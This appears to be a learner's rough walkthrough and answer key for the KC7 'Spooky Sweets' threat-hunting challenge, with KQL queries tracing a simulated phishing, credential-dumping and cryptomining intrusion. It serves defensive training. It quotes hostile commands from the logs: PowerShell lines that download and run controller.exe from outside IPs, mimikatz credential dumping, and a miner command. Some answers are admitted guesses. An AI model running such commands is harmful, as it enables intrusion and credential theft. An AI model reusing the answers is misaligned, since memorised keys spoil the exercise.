About This Investigation
The Spooky Sweets Candy Company is a renowned confectionery enterprise with a captivating history and a substantial global following. Founded in the early 20th century by the imaginative Wilhelmina "Willy" Whipple, the company has since evolved into a Halloween sensation. Spooky Sweets is celebrated for its inventive and spooky-themed candy creations, contributing significantly to the Halloween spirit.

S0q1

Email
| take 10

S0q2
How many employees are in the company?

Employees
| count
//1500

S0q3

Each employee at Spooky Sweets Candy Company is assigned an IP address. Which employee has the IP address: “10.10.0.251”?

Employees
| where ip_addr contains "10.10.0.251"

Arthur Wigfall
QCDR-LAPTOP
arwigfall
arthur_wigfall@spookysweets.xyz
spookysweets.xyz

S0Q4

How many emails did Timothy Moran receive?

Email
| where recipient contains "Timothy_Moran@spookysweets.xyz"
///50

S0Q5

How many distinct senders were seen in the email logs from spoopycandysupplies.com?

Email
| where sender contains "spoopycandysupplies.com"
| distinct sender
//2076

S0q6

How many unique URLs did “Michael Dawson” visit?

let A=
Employees
| where name contains "Dawson"
| distinct ip_addr;
OutboundNetworkEvents
| where src_ip in(A)
| distinct url
//45

S0Q7

How many domains in the PassiveDns records contain the word “Halloween”? (hint: use the contains operator instead of has. If you get stuck, do a take 10 on the table to see what fields are available.)

PassiveDns
| where domain contains "Halloween"

192.37.102.174	halloween-fall.com
17.10.87.161	halloween-infrastructure.com
48.13.200.247	halloween-business.com

////3

S0Q8

What IPs did the domain “halloween-infrastructure.com” resolve to (enter any one of them)?

PassiveDns
| where domain contains "halloween-infrastructure.com"

17.10.87.161	halloween-infrastructure.com

S0Q9

How many unique URLs were browsed by employees named “Karen”?

let A=
Employees
| where name contains "karen"
| distinct ip_addr;
OutboundNetworkEvents
| where src_ip in(A)
| distinct url

///129

S1q1

Oh no! A bunch of computers had their wallpapers changed. Your IT was able to grab a copy of one of them, but it seems that it slightly changes each time it's on a computer. It looks like this:

 spooky.png

Email
| where sender contains "@yandex.com"

s1q2

Let's search for this file. How many hosts have this file?

FileCreationEvents
| where filename contains "spooky.png"
| distinct username
///839


s1q3
What folder is this file found in?

FileCreationEvents
| where filename contains "spooky.png"

///Pictures
s1q4
When was the first wallpaper created?

FileCreationEvents
| where filename contains "spooky.png"
| sort by timestamp asc
//2023-10-09T02:00:42.000Z

s1q5

What is the SHA256 of that file?

FileCreationEvents
| where filename contains "spooky.png"
| sort by timestamp asc

c27383277bf017f56b4d5b7b11419b09230b264fb40b0c42311c59f4c596a5f8

s1q6

Let's look at the host where the first wallpaper was created. What is the role of the employee that uses this computer?

FileCreationEvents
| where filename contains "spooky.png"
| sort by timestamp asc

Employees
| where username contains "rojoyner"

10.10.2.105
KQQT-DESKTOP

//role /// Regulatory Candy Specialist

s1q7

The threat actor must have left something behind to show how they set the wallpaper. What time did they set the wallpaper on this host?


ProcessEvents
| where process_commandline contains "spooky.png"
| where username contains "rojoyner"

2023-10-09T04:18:46.000Z

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Public\Pictures\spooky.png /f

s1q8

What command did they run to update the host system to the new wallpaper?

ProcessEvents
| where process_commandline contains "update"
| where username contains "rojoyner"
//RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

2023-10-09T04:49:08.000Z


s1q9

It was reported that around the same time the wallpapers changed, a lot of people got an email about mandatory training they had to do.

How long was this video? Provide the format in MM:SS (ex. 12:34).

wallpaper change at 2023-10-09T04:49:08.000Z

Email
| where timestamp between ( datetime(2023-10-09T04:45)..datetime(2023-10-09T05:00) )
| where subject contains "training" and subject contains "mandatory"

https://www.youtube.com/watch?v=dQw4w9WgXcQ

check the youtube time

03:33

s1q10
All of these training emails were sent to employees with the same role. Which job role received the email?

let A=
Email
| where timestamp between ( datetime(2023-10-09T04:45)..datetime(2023-10-09T05:00) )
| where subject contains "training" and subject contains "mandatory"
| distinct recipient;
Employees
| where email_addr in (A)
| distinct role

Candy Researcher


s1q11

Let's see if the threat actor reached out to targets via email in the past. How many emails have subject lines with the hacker group's name in them?

haker group name  == pumpkin patch pirates

Email
| where subject contains "pumpkin patch pirates"
//24

[EXTERNAL] Trick or Treat: Pumpkin Patch Pirates has sent you a message.

s1q12
Most of those emails were sent from which email address?

Email
| where subject contains "pumpkin patch pirates"
| summarize Count = count() by sender

booiknowwhatyoudid@yandex.com	11
boo.boo@hotmail.com	13

//boo.boo@hotmail.com

s1q13

Which of the links in those emails contains an important file?

Email
| where subject contains "pumpkin patch pirates"
| distinct link

//https://spooky-fall.com/modules/public/public/important-letter.docx

S1q14

What IP does the domain from that link resolve to?

spooky-fall.com

PassiveDns
| where domain contains "spooky-fall.com"

141.107.162.16

s1q15

When did that IP visit the Spooky Sweets website?

InboundNetworkEvents
| where src_ip contains "141.107.162.16"
| where url contains "spookysweets.xyz"

10/2/2023, 3:39:28 AM

https://spookysweets.xyz/search=administrator

s1q16

The activity from Q15 demonstrates which MITRE ATT&CK technique?

/// T1594 : Search Victim-Owned Websites


s1q17

Hey!! The IT folks said to stop what you're doing and investigate another set of emails they got around the same time wallpapers were changed. Within the link, what is the wisdom they impart?

wallpaper change at 2023-10-09T04:49:08.000Z

Email
| where timestamp between ( datetime(2023-10-09T04:45)..datetime(2023-10-09T05:00) )
| distinct link


Dog of Wisdom

https://www.youtube.com/watch?v=D-UmfqFjpl0

containt of the youtube: Dog of Wisdom

the wsdom is:
 If your ball Is too big for your mouth, it's not yours.;If your ball Is too big for your mouth its not yours


s1Q18


… Let's go back to our email investigation. Looking at the phishing emails sent by the adversary, which number will surprise us?

Email
| where sender in ("boo.boo@hotmail.com", "booiknowwhatyoudid@yandex.com")
or reply_to  in ("boo.boo@hotmail.com", "booiknowwhatyoudid@yandex.com")
| distinct subject

[EXTERNAL] Trick or Treat: Pumpkin Patch Pirates has sent you a message.
[EXTERNAL] The Internet's Top 10 Spooky list. Number 3 will surprise you...
[EXTERNAL] RE: BOO! Ready or not, here we come.
[EXTERNAL] RE: Your name has been added to the hit list. Beware of the Pumpkin Patch Pirates


Number 3 will surprise you...
//3


s1Q19

What's the name of the excel document they sent?

Email
| where sender in ("boo.boo@hotmail.com", "booiknowwhatyoudid@yandex.com")
or reply_to  in ("boo.boo@hotmail.com", "booiknowwhatyoudid@yandex.com")
| distinct link


[EXTERNAL] Trick or Treat: Pumpkin Patch Pirates has sent you a message.
boo.boo@hotmail.com

http://spookyfall.com/images/final_notice.xlsx

///final_notice.xlsx


s1q20

Some time after the initial emails they sent follow up emails to gather more information. What domain did the senders come from?

find emails after the initial phishing campaign


let victims =
Email
| where sender in ("boo.boo@hotmail.com","booiknowwhatyoudid@yandex.com")
| distinct recipient;
Email
| where recipient in (victims)
| extend domain = tostring(split(sender,"@")[1])
| summarize count() by domain



spookysweets.xyz	367
yandex.com	68
verizon.com	60
hotmail.com	54
aol.com	51
protonmail.com	47
gmail.com	46
spookysweetsuppliers.shop	43
spoopycandysupplies.com	42
spookycandycompliance.biz	34
yahoo.com	31
spoopycandydistribution.site	23


//spookysweets.xyz

or simply

Email
| where subject == "[EXTERNAL] RE: Your name has been added to the hit list. Beware of the Pumpkin Patch Pirates"
| distinct recipient

susie_warrington@spookysweets.xyz
hortencia_maeda@spookysweets.xyz
charles_whorton@spookysweets.xyz
robert_tanner@spookysweets.xyz
jeffry_hetz@spookysweets.xyz
rose_bartholomew@spookysweets.xyz
maria_kallas@spookysweets.xyz
sharon_black@spookysweets.xyz
christopher_jones@spookysweets.xyz
mark_middaugh@spookysweets.xyz
miriam_young@spookysweets.xyz
shane_mckellar@spookysweets.xyz



s1q21

Hmm, that's really weird. What was the subject?

we kown several employees have clicked , that means count only same subeject > 1 and manuelly check for the answer


Email
| where timestamp >= datetime(2023-10-05T09:59:46.000Z)
| where sender contains "spookysweets.xyz"
| summarize count()by subject
| where count_ > 1
| order by count_ desc

the solution is :

//Unusual Logon. Please verify your login activity.

Email
| where timestamp >= datetime(2023-10-05T09:59:46.000Z)
| where sender contains "spookysweets.xyz"
| where subject contains "Unusual Logon. Please verify your login activity"
| distinct link



diestinct sender (threat actor )

rose_bartholomew@spookysweets.xyz
scott_provencal@spookysweets.xyz

Recipient who received the mail and link 

renaldo_deleon@spookysweets.xyz
terrie_bridges@spookysweets.xyz
ricky_smith@spookysweets.xyz
anna_bruce@spookysweets.xyz
tracy_james@spookysweets.xyz
cynthia_mack@spookysweets.xyz


http://infrastructureknowledge.com/images/search/files/sign_in
https://halloween-fall.com/images/published/published/modules/login?language=en


s1q22

Several employees clicked on the link and got compromised. When the attackers got access to those employees' machines, they decided to move laterally. What command was used to dump credentials on several hosts?

ProcessEvents
| take 1


who click on thise link

http://infrastructureknowledge.com/images/search/files/sign_in
https://halloween-fall.com/images/published/published/modules/login?language=en


check  tools for dumoing credentials 

ProcessEvents
| where process_commandline has_any (
"mimikatz.exe",
"sekurlsa",
"procdump.exe",
"lsass.exe",
"rundll32.exe",
"pypykatz"
)
| distinct process_commandline

Response

////// mimikatz.exe "sekurlsa::logonpasswords"

ProcessEvents
| where process_commandline has_any ("mimikatz.exe")
| distinct username
//26 time

S1q23

What is the MITRE ATT&CK ID of this tool?

mimikatz.exe

///S0002

"What MITRE ATT&CK technique does sekurlsa::logonpasswords use?"
→ T1003.001 (LSASS Memory).

S1q24

search on the net for popular commands; net view
we shoud have 26 time the same command

let A=
ProcessEvents
| where process_commandline has_any ("mimikatz.exe")
| distinct username;
ProcessEvents
| where username in (A)
| where process_commandline has_any ("net", "domain")
| summarize UserCount=count() by process_commandline
| order by UserCount desc

net view /all /domain	26
net view	2
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('https://196.2.219.94/controller.exe'))"	1
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('https://206.102.244.26/controller.exe'))"	1

Response is 
///  net view /all /domain

S1Q25
When was the first time this command was executed?

ProcessEvents
| where process_commandline has_any ("net view /all /domain")

/////// 2023-10-02T11:55:34.000Z 
TQ3G-DESKTOP	sccrissman


S1q26

Who is the user of that host? Provide the full name.

Employees
| where hostname  contains "TQ3G-DESKTOP"

///Scott Crissman

s1q27


What command used by the threat actor was used to look for information about services?

| Command / Tool              | Example Command                                         | Purpose                              | MITRE ATT&CK                     |
| --------------------------- | ------------------------------------------------------- | ------------------------------------ | -------------------------------- |
| **sc.exe**                  | `sc query`                                              | Enumerate services on a host         | T1007 – System Service Discovery |
| **sc.exe**                  | `sc query state= all`                                   | List all services and states         | T1007                            |
| **tasklist**                | `tasklist /svc`                                         | Maps running processes to services   | T1007                            |
| **net.exe**                 | `net start`                                             | Lists running services               | T1007                            |
| **wmic.exe**                | `wmic service get name,displayname,state`               | Query services via WMI               | T1007                            |
| **PowerShell Get-Service**  | `Get-Service`                                           | Enumerate Windows services           | T1007                            |
| **PowerShell**              | `Get-Service \| Where-Object {$_.Status -eq "Running"}` | Find running services                | T1007                            |
| **PowerShell CIM/WMI**      | `Get-CimInstance Win32_Service`                         | Query service information            | T1007                            |
| **cmd.exe**                 | `net start`                                             | View active services                 | T1007                            |
| **Sysinternals PsService**  | `psservice.exe \\host`                                  | Remote service enumeration           | T1007                            |
| **PowerView**               | `Get-DomainService`                                     | Enumerate domain services            | T1007                            |
| **AdFind**                  | `adfind -sc serv`                                       | Query AD service-related information | T1007                            |
| **BloodHound / SharpHound** | `SharpHound.exe -c Services`                            | Collect service relationships        | T1007                            |






look for commande used 26 time

ProcessEvents
| where process_commandline has_any (
 "sc query",
"tasklist",
"net",
"wmic"
)
| summarize UserCount=count() by process_commandline
| order by UserCount desc


tasklist /svc	27 ///nop
net view	27 //nope
sc query	26
net view /all /domain	26 ////already used 

///sc query


s1q28
What is the MITRE ATT&CK ID for this type of technique?

research on Internet
| Technique                    | MITRE ATT&CK ID | Description                                                                                                                                              |
| ---------------------------- | --------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------- |
| **System Service Discovery** | **T1007**       | Adversaries may enumerate services running on a system to gather information about installed services, their states, and potential attack opportunities. |

System Service Discovery
sc query

///T1007



s1q29

It was reported that Carlton Toth had a significant security alert. Look for what the alert is. What file was alerted?

SecurityAlerts
| take 1


Employees
| where name contains "Carlton Toth" //P7DJ-LAPTOP 10.10.0.48 catoth
| distinct hostname

SecurityAlerts
| where description contains "P7DJ-LAPTOP"


Filename: treat.ps1. Sha256: 5ca8e69c92fd1ae4bef806b97ff7dd301c2efc3a962c6229057ebfc26a034eed


///  treat.ps1

S1q30

Let's investigate that file path across all of the hosts. How many other files were found in that directory?

FileCreationEvents
| where hostname  contains "P7DJ-LAPTOP"
| where filename  contains "treat.ps1"

C:\PerfLogs\treat.ps1

pivot 

FileCreationEvents
| where path contains @"C:\PerfLogs\"
//| distinct filename

treat.ps1
legit.ps1
ded.ps1
trick.ps1

///3

S1q31


ProcessEvents
| where process_commandline has_any (
    "treat.ps1",
"legit.ps1",
"ded.ps1",
"trick.ps1"
)
| summarize UserCount=count() by process_commandline
| order by UserCount desc

cmd.exe /c start %SYSTEMROOT%\system32\WindowsPowerShell\v1.0\powershell.exe -noni -nop -exe bypass -f \\share1\Admin$\trick.ps1	23
powershell.exe -ex bypass -file C:\windows\temp\ded.ps1	23

we see a share directory 


cmd.exe /c start %SYSTEMROOT%\system32\WindowsPowerShell\v1.0\powershell.exe -noni -nop -exe bypass -f \\share1\Admin$\trick.ps1

Response 

// trick.ps1

s1q32

Which other file was executed?

ProcessEvents
| where process_commandline has_any (
    "treat.ps1",
"legit.ps1",
"ded.ps1",
"trick.ps1"
)
| summarize UserCount=count() by process_commandline
| order by UserCount desc

powershell.exe -ex bypass -file C:\windows\temp\ded.ps1	23

// ded.ps1

let A=
ProcessEvents
| where process_commandline has_any (
    "treat.ps1",
"legit.ps1",
"ded.ps1",
"trick.ps1"
)
| distinct  hostname;
Employees
| where hostname in (A)
| where role has_any ("chief", "CEO", "executive", "director")
| project role, name, username

Chief Financial Officer	Rose Bartholomew robartholomew

///Chief Financial Officer


s1q34

How many distinct job roles had these files in that directory?




let A=
FileCreationEvents
| where path contains @"C:\PerfLogs\"
| distinct username;
Employees
| where username  in (A)
| distinct role

Marketing Sweet Tooth
Regulatory Candy Specialist
Quality Control Analyst
Candy Researcher
Sales Candy Connoisseur
Candy Scientist
Chief Financial Officer
HR Specialist

//8

s1q35 

What is the SHA256 hash of the wallpaper from Section 1, Q1?

spooky.png   that is file to look for


search for wallpaper


FileCreationEvents
| where filename == "spooky.png"
| project timestamp, filename, sha256
| sort by timestamp asc

Was the wallpaper actually modified after creation?

ProcessEvents
| where process_commandline contains "spooky.png"
| project timestamp, hostname, username, process_commandline

It's asking for the wallpaper from Section 1, Q1.

I downlowd the wallpper and used virustotal and better chatGPT


https://raw.githubusercontent.com/KC7-Foundation/kc7_data/refs/heads/main/SpookySweets/spooky.png

AI prompt
Download spooky.png from GitHub and upload it here. I can compute the SHA256 immediately and verify whether it matches what KC7 expects.

SHA256

499d342120bad21b637a1aa2bb54ac35e2bb5e3f2dd298dbf6fa3c398fc03fad

The file properties I hashed were:

Filename: spooky.png
Size: 138,025 bytes
SHA256: 499d342120bad21b637a1aa2bb54ac35e2bb5e3f2dd298dbf6fa3c398fc03fad

/// 499d342120bad21b637a1aa2bb54ac35e2bb5e3f2dd298dbf6fa3c398fc03fad


S1q36

It doesn't seem to be the same file extension it's saying it is. What type of file is it?

using virustotal

i search info with the SHA256 found in s1q35

https://www.virustotal.com/gui/file/499d342120bad21b637a1aa2bb54ac35e2bb5e3f2dd298dbf6fa3c398fc03fad

spooky.png
Size
134.79 KB
Last Analysis Date
4 months ago
jpeg

/// the extension is a jpeg 

s1q37

It looks like the threat actor tried different filenames. What was the first one

use virustotal  the detais page and go to names and take the last one of the list which is the first created


/// wallpaper pumpkin actor.jpg

s1q38

Let's go back and double check. What other picture did the threat actor drop on the systems?

the goal is to find the same among 839 for a file . We know, the attackers sent the spooky.png file 839 time on the system .
we expect the same count for the new file

FileCreationEvents
| where filename has_any ("png", "jpg","jpeg")
| summarize UserCount=count() by filename
| order by UserCount desc

trickortreat.png	839
spooky.png	839 ///known
2.jpg	33

///trickortreat.png  is the response also found in virustotal as the third name

S1q39

The CEO of the company sat everyone down during the all hands meeting and said it was all a test. What type of group would conduct these types of tests?

/// Red Team

A red team conducts adversarial security exercises that simulate real attackers to evaluate an organization's ability to prevent, detect, and respond to attacks. In this scenario, the CEO revealing that "it was all a test" is describing a classic red team exercise.

Depending on the platform, acceptable variants may include:

✅ Red Team (most likely expected)
Red Team Exercise
Adversary Emulation Team (less likely)

Section 2: Cyber Coven

S2q1

Spooky Sweets is working on an important new candy recipe. It's so secret that only the CEO and the Lead Researchers know about it. Unfortunately, we recently detected several employees looking at the important research plans in the "candy_projects" folder within the company's sharepoint. Something spooky might be afoot. How many users were seen accessing this document?

InboundNetworkEvents
| where url contains "candy_projects" and url contains "sharepoint"
| distinct src_ip


//16

https://sharepoint.spookysweets.xyz/candy_projects/files/research.docx


S2q2

These users were certainly behaving strangely. What content were they sending around?


InboundNetworkEvents
| where url contains "candy_projects" and url contains "sharepoint"

time begin
2023-09-20T08:54:43.000Z

end time
2023-10-04T07:15:22.000Z

let A=
FileCreationEvents
| where filename has_any ("trickortreat.png")
| distinct username;
let B=
Employees
| where username in (A)
| distinct email_addr;
Email
| where sender in (B)
| where timestamp between (datetime(2023-09-20T08:54) .. datetime(2023-10-04T07:15))
| summarize UserCount=count() by link
| order by UserCount desc


///  https://www.youtube.com/watch?v=AUnTGNVDWZU


S2q3

The actor got control of these victims by loading an implant that downloads a file.

What is the name of that file?



let A=
FileCreationEvents
| where filename has_any ("trickortreat.png")
| distinct username;
FileCreationEvents
| where username   in (A)
| where timestamp between (datetime(2023-09-20T08:54) .. datetime(2023-10-04T07:15))
| summarize UserCount=count() by path
| order by UserCount desc

C:\ProgramData\controller.exe

Response is 
///controller.exe

S2q4

Find the initial access vector for this intrusion. What message did it include about 10/31?
find message about Halloween

Think about common initial vectors for intrusion, which table is most likely to contain it? Then focus on the date mentioned to find it (not necessarily as a timestamp though

search *
| distinct $table

InboundNetworkEvents
Email
OutboundNetworkEvents
PassiveDns
FileCreationEvents
Employees
ProcessEvents
SecurityAlerts
AuthenticationEvents



// Victims who downloaded controller.exe  theare 27 

let victims =
FileCreationEvents
| where filename == "controller.exe"
| distinct username;
let victimEmails =
Employees
| where username in (victims)
| project email_addr;
Email
| where subject contains "october"
| where recipient in (victimEmails)
| summarize count() by subject
| order by count_ desc


Response

///[EXTERNAL] Your facility is closing on October 31.

S2Q5
Which role did the actors primarily target?

let A=
Email
| where subject contains "[EXTERNAL] Your facility is closing on October 31."
| distinct recipient;
Employees
| where email_addr has_any (A)


1/17/2015, 11:51:07 AM	Regulatory Candy Specialist

/// Regulatory Candy Specialist

S2q6

Once the threat actor got in to the environment, they were interested in another type of recon and were trying to figure out how to do it. Who helped them indirectly?

Victims who downloaded controller.exe  they are 27 

let victims =
FileCreationEvents
| where filename == "controller.exe"
| distinct username;
let victimsagain=
Employees
| where username in (victims)
| project ip_addr;
OutboundNetworkEvents
| where src_ip in (victimsagain)
| where url has_any ("recon")
| project  url, src_ip


https://svch0st.medium.com/active-directory-recon-cheat-sheet-76ccc16dc6e8

answer is 
/// svch0st

matches the question wording almost perfectly:

"the threat actor got in to the environment, they were interested in another type of recon and were trying to figure out how to do it. Who helped them indirectly?"

The attacker was doing Active Directory reconnaissance and visited an Active Directory Recon Cheat Sheet. Active Directory recon commonly involves enumerating domains, users, groups, computers, trusts, etc.

S2Q7


Based off of the answer from Q3, how many unique IP addresses did they obtain this file from?



let A=
FileCreationEvents
| where filename has_any ("trickortreat.png")
| distinct username;
FileCreationEvents
| where username   in (A)
| where timestamp between (datetime(2023-09-20T08:54) .. datetime(2023-10-04T07:15))
| summarize UserCount=count() by path
| order by UserCount desc


C:\ProgramData\controller.exe

the file is controller.exe

ProcessEvents
| where process_commandline contains "controller.exe"
| extend ip = extract(@"https?://(\d{1,3}(?:\.\d{1,3}){3})", 1,  process_commandline)
| distinct ip
//14

196.2.219.94
150.74.199.69
221.223.15.98
52.229.194.167
55.149.106.154
68.45.221.34
131.76.157.178
206.102.244.26
131.166.76.223
187.192.151.88
206.107.129.150
120.169.249.54
129.200.152.101
222.21.241.227



S2q8

How many total domains do these IPs resolve to?

let A=
ProcessEvents
| where process_commandline contains "controller.exe"
| extend ip = extract(@"https?://(\d{1,3}(?:\.\d{1,3}){3})", 1,  process_commandline)
| distinct ip;
PassiveDns
| where ip has_any (A)
//9


222.21.241.227	safetyregulations.com
52.229.194.167	regulations-compliance.net
196.2.219.94	regulationscompliance.com
206.107.129.150	safetylegal.com
150.74.199.69	safety-regulations.net
221.223.15.98	legal-compliance.net
206.102.244.26	health-compliance.net
131.76.157.178	healthcompliance.com
68.45.221.34	regulations-compliance.com


S2Q9

Which IP address is from the country where the Nile River is located in?

use this site to check each IP comming from Egypte

https://www.whois.com/

Response 

///// 196.2.219.94



S2q10

Which IP address is from the country that is the last Grand Duchy in the world?

check where is tha las grand Duchy in theworld

refers to Luxembourg 🇱🇺 (the Grand Duchy of Luxembourg).


ProcessEvents
| where process_commandline contains "controller.exe"
| extend ip = extract(@"https?://(\d{1,3}(?:\.\d{1,3}){3})", 1,  process_commandline)
| distinct ip
//14

196.2.219.94
150.74.199.69
221.223.15.98
52.229.194.167
55.149.106.154
68.45.221.34
131.76.157.178
206.102.244.26
131.166.76.223
187.192.151.88
206.107.129.150
120.169.249.54
129.200.152.101
222.21.241.227


the response is 

///////  131.166.76.223

s2q11

What tool did the threat actor most likely install for final actions on objectives?
Final objective (steal data, persist, etc.)


27  user download the file controller 

FileCreationEvents
| where filename == "controller.exe"
| distinct username

check tool in this directory

C:\ProgramData
C:\Users\Public
C:\Windows\Temp



FileCreationEvents
| where timestamp > datetime(2023-09-20)
| where filename !contains "controller.exe"
| where path has_any (
@"C:\ProgramData",
@"C:\Users\Public",
@"C:\Windows\Temp"
)
| project timestamp, username, filename, path
| order by timestamp asc
| summarize UserCount=count() by filename
| order by UserCount desc



spooky.png	839
tunes-but-recipes.7z	303
7z2002-x64.exe	303
documents.7z	303
Runner.exe	303
mimikatz_output.txt	26
treat.ps1	3
legit.ps1	3


/// 7z2002-x64.exe is 

The threat actor:

Installed a compression tool:

7z2002-x64.exe

Created archive files:

documents.7z
tunes-but-recipes.7z

Likely used those archives for data staging before exfiltration.

This maps directly to MITRE ATT&CK:

T1560 – Archive Collected Data
Tool commonly used: 7-Zip

7z2002-x64.exe

or, if the platform wants the tool name:

7-Zip

the plattform wants this form  /// 7-Zip



controller.exe       → initial compromise
mimikatz_output.txt  → credential access
7-Zip                → archive/stage data
documents.7z         → collected data


S2q12

What delivery mechanism did they likely use to accomplish this goal?

/// email

S2Q13

What is the path where important documents may have been staged? Copy and paste the full path.


Tool:

7-Zip

Archives created:

documents.7z
tunes-but-recipes.7z

FileCreationEvents
| where timestamp > datetime(2023-09-20)
| where filename !contains "controller.exe"
| where path has_any (
@"C:\ProgramData",
@"C:\Users\Public",
@"C:\Windows\Temp"
)
| project timestamp, username, filename, path
| order by timestamp asc
| summarize UserCount=count() by filename
| order by UserCount desc


controller.exe       → initial compromise
mimikatz_output.txt  → credential access
7-Zip                → archive/stage data
documents.7z         → collected data



FileCreationEvents
| where filename in ("documents.7z")
| project timestamp, username, filename, path
| summarize UserCount=count() by path
| order by UserCount desc




//// response    C:\Users\Public\Documents\documents.7z

S2q14



What is the path where the recipes were likely staged? Copy and paste the full path.

FileCreationEvents
| where timestamp > datetime(2023-09-20)
| where filename !contains "controller.exe"
| where path has_any (
@"C:\ProgramData",
@"C:\Users\Public",
@"C:\Windows\Temp"
)
| project timestamp, username, filename, path
| order by timestamp asc
| summarize UserCount=count() by filename
| order by UserCount desc

spooky.png	839
tunes-but-recipes.7z	303
7z2002-x64.exe	303
documents.7z	303
Runner.exe	303
mimikatz_output.txt	26
treat.ps1	3
legit.ps1	3

FileCreationEvents
| where filename in ("tunes-but-recipes.7z")
| project timestamp, username, filename, path
| summarize UserCount=count() by path
| order by UserCount desc

///// response    C:\Users\Public\Music\tunes-but-recipes.7z





s2q15


Recently, computers have been slow and the company's electricity bill has nearly doubled. What file did the threat actor execute that may have caused this?


FileCreationEvents
| where timestamp > datetime(2023-09-20)
| where filename !contains "controller.exe"
| where path has_any (
@"C:\ProgramData",
@"C:\Users\Public",
@"C:\Windows\Temp"
)
| project timestamp, username, filename, path
| order by timestamp asc
| summarize UserCount=count() by filename
| order by UserCount desc

spooky.png	839
tunes-but-recipes.7z	303
7z2002-x64.exe	303
documents.7z	303
Runner.exe	303
mimikatz_output.txt	26
treat.ps1	3
legit.ps1	3



////////  Runner.exe 


S2q16


What is the name of this tool?

after researching on thenet  

Based on the pattern of the previous questions, the platform is likely making the same distinction it did with 7-Zip:

File executed: Runner.exe
Tool name: the actual software/miner behind Runner.exe

The most likely tool is XMRig, which is by far the most commonly deployed cryptomining tool in intrusion scenarios.

///  XMRig

S2q17

What is the MITRE ATT&CK ID of this attack?


//////   T1496


S2q18

Who really hacked Spooky Sweets?



ProcessEvents
| where process_commandline  contains  "Runner.exe"
| project timestamp, username, process_commandline
| distinct process_commandline

Runner.exe -a cryptonight-heavy --url=witchs.coven.rocks:666 -u SGFja2VkIGJ5IHRoZSBXaXRjaCdzIENvdmVu -R --variant=-1 --max-cpu-usage=75

The Runner.exe command line contains:

-u SGFja2VkIGJ5IHRoZSBXaXRjaCdzIENvdmVu

That value is Base64 encoded.

Decoding:

SGFja2VkIGJ5IHRoZSBXaXRjaCdzIENvdmVu

becomes:

Hacked by the Witch's Coven

/// response is the Witch's Coven

the challenge is done 








/////////

